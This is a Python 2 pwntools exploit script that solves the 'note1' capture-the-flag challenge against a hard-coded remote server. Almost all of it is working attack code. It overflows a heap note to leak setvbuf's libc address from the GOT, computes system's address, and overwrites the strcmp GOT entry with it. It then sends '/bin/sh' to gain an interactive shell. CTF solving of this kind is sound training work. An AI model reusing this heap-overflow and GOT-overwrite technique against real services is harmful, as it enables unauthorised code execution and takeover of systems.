#!/usr/bin/env python
# coding=utf8
# Python 2 / pwntools solve script for the 'note1' CTF challenge.  It drives a
# menu-driven service by sending option numbers blindly (no prompts are read
# until the leak), so the sendline() sequence below must stay in exactly this
# order.
from pwn import p64, ELF, process, remote
from struct import unpack
from time import sleep
# p = process('./note1')   # local run of the challenge binary (alternative to the remote line)
p = remote('115.28.27.103', 9001)   # contest server hard-coded by the author
# libc shipped with the challenge; only used to compute a symbol-to-symbol distance.
elf = ELF('./libc-2.19.so')
# Addresses of two GOT entries in the challenge binary (constants taken from the
# binary itself, not derivable from this file -- presumably non-PIE; verify).
strcmp_got = 0x602048
setvbuf_got = 0x602060
# Distance between two libc symbols is constant regardless of the load address,
# so it can be added to the leaked runtime address of setvbuf further down.
system_offset_to_setvbuf = elf.symbols['system'] - elf.symbols['setvbuf']
# Menu setup: the exact meaning of options '1'/'2'/'3' is not visible here;
# the author's comments below indicate '3' + index is "edit note".
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('1')
p.sendline('2')
p.sendline('2')
p.sendline('2')
p.sendline('1')
p.sendline('3')
p.sendline('3')
p.sendline('3')
# edit the first note to make a heap overflow, then leak a libc address (setvbuf)
p.sendline('3')
p.sendline('1')
p.sendline('A' * 280 + p64(setvbuf_got - 0x70) + '2')
p.sendline('2')
# The leaked pointer is printed after the third 'content=' marker.
p.recvuntil('content=')
p.recvuntil('content=')
p.recvuntil('content=')
# 6 leaked bytes padded to 8 and decoded as a native-order unsigned 64-bit value.
setvbuf_addr = unpack('Q', p.recv(6) + '\x00'*2)[0]
print '[*] setvbuf_addr: ' + hex(setvbuf_addr)
# edit the second note to modify the strcmp GOT entry to point at system
p.sendline('3')
p.sendline('2')
p.sendline('A' * 280 + p64(strcmp_got - 0x70) + '3')
p.sendline('3')
p.sendline('\x00')
# New GOT value: leaked setvbuf address plus the libc-relative distance computed above.
p.sendline(p64(setvbuf_addr + system_offset_to_setvbuf))
# trigger strcmp
p.sendline('3')
p.sendline('/bin/sh')
# Drain whatever the service printed so far before handing the session to the user.
sleep(0.1)
p.clean()
p.interactive()